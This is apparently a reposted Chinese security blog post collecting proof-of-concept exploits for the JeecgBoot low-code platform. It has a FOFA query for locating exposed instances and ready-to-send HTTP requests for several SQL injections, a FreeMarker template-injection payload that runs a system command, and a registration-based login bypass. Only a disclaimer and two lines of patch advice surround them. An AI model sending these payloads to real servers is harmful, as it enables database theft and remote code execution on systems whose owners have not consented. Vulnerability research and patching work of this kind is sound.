SCA御盾实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 产品描述
「企业级低代码平台」前后端分离架构SpringBoot 2.x3.x,SpringCloud,Ant Design&Vue,Mybatis,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码! 引领新的开发模式OnlineCoding->代码生成->手工MERGE,帮助Java项目解决70%重复工作,让开发更关注业务,既能快速提高效率,帮助公司节省成本,同时又不失灵活性。。
0x03 fofa语法:
app="JEECG"
0x04 漏洞详情
1、jeecg-boot-getDictItemsByTable-sqli
GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encodinggzip, deflateConnection: closeUpgrade-Insecure-Requests1Sec-Fetch-DestdocumentSec-Fetch-ModenavigateSec-Fetch-SitenoneSec-Fetch-User?1GET /sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encodinggzip, deflateConnection: closeUpgrade-Insecure-Requests1Sec-Fetch-DestdocumentSec-Fetch-ModenavigateSec-Fetch-SitenoneSec-Fetch-User?1
2、jeecg-boot-queryTableData-sqli
GET /jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMAGET /sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA
3、jeecg-boot-sqli
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}POST /jmreport/qurestSql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}
4、jeecg-queryFieldBySql-rce
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 58{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }' "}POST /jmreport/queryFieldBySql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 58{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }' "}
5、jeecg-register-login-bypass(星球发布利用exp)
POST /jeecg-boot/sys/user/register HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8{"username": "aaaa","password": "123456","phone": "123456","smscode": "0enb"}
0x05 修复建议
1、升级jeecgboot系统至最新版本
2、官网下载最新安全补丁:http://jeecg.com
漏洞poc+漏洞批量扫描脚本+exp
原文始发于微信公众号(SCA御盾):【漏洞复现】jeecg漏洞集合
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论